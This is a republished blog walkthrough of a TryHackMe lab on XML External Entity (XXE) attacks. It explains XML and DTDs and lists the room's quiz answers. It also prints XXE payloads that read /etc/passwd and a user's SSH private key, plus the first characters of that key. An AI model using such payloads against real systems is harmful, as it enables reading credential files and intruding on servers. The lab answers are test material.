XXE — TryHackme WriteUp
2022-1-10 12:28:0 Author: infosecwriteups.com(查看原文) 阅读量:12 收藏

XML External Entity Writeup

Mukilan Baskaran

Welcome back great hackers I am here another cool topic one of the OWASP top 10 topics which is the XXE attack concept. XXE stands for XML External Entity which abuses XML data/parsers. It allows the hacker to interact with backend data. This would cause a DOS attack and SSRF and in some cases which could lead to an RCE attack.

There are two types of XXE attacks which are in-band and out-of-band:

in-band: Hacker can get an immediate response after injecting XXE payload. out-of-bad: No immediate response from web application.

Because we get to know about XXE vulnerability we have to know about XML.

What is XML?

XML - eXtensible Markup Language is a markup language that defines a set of rules for encoding documents in a format that is both machine-readable and human-readable. It is used for storing and transporting data.

Why do we use XML?

1. Because XML is platform and programming language agnostic, it may be utilized on any system and adapt to technological changes as they occur.

2. XML data can be modified at any moment without impacting the appearance of the data.

3. XML supports DTD and Schema validation. This validation verifies that there are no syntax errors in the XML document.

4. Because of its platform independence, XML makes data interchange between systems easier. When transferring XML data between systems, there is no need to convert it.

Tasks:

Full form of XML

Extensible Markup Language

Is XML case sensitive?

yes

Is it compulsory to have XML prolog in XML documents?

no

Can we validate XML documents against so schema?

yes

How can we specify XML version and encoding in XML document?

XML prolog

We’ll need to know what DTD in XML is before we can start studying XXE.

Document Type Definition (DTD) is an acronym for Document Type Definition. An XML document’s structure allowed components and attributes to be defined by a DTD.

Let’s look at how that DTD validates the XML now. Here’s a list of all the terms mentioned in the note.
1. !DOCTYPE note — Defines the document’s root element, note
2. !ELEMENT note — This specifies that the note element must include the following elements: “to, from, heading, and body”
3. !ELEMENT to — Defines the type of the to element as “#PCDATA”
4. !ELEMENT from — Defines the type of the from element as “#PCDATA”
5. !ELEMENT heading — Defines the type of the heading element as “#PCDATA”
6. !ELEMENT body — Defines the type of the body element as “#PCDATA”.

Tasks

With what extension do you save a DTD file?

dtd

How do you define a new ELEMENT?

!ELEMENT

How do you define a ROOT element?

!DOCTYPE

How do you define a new ENTITY?

!ENTITY

Now we can go for an understanding of how XXE works by injecting payload in the vulnerable web app.

Ist payload:

<?xml version=”1.0"?>
<!DOCTYPE replace [<!ENTITY name “feast”> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

After injecting this simple payload we will know whether vulnerability works on the web application.

Payload 2:

We try to read system files by applying payload

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

Task:

What is the name of the user in /etc/passwd

falcon

What are the first 18 characters for falcon’s private key

payload used:

<?xml version=”1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM ‘file:///home/falcon/.ssh/id_rsa’>]>
<root>&read;</root>

MIIEogIBAAKCAQEA7


文章来源: https://infosecwriteups.com/xxe-tryhackme-writeup-29fb1e0e2666?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh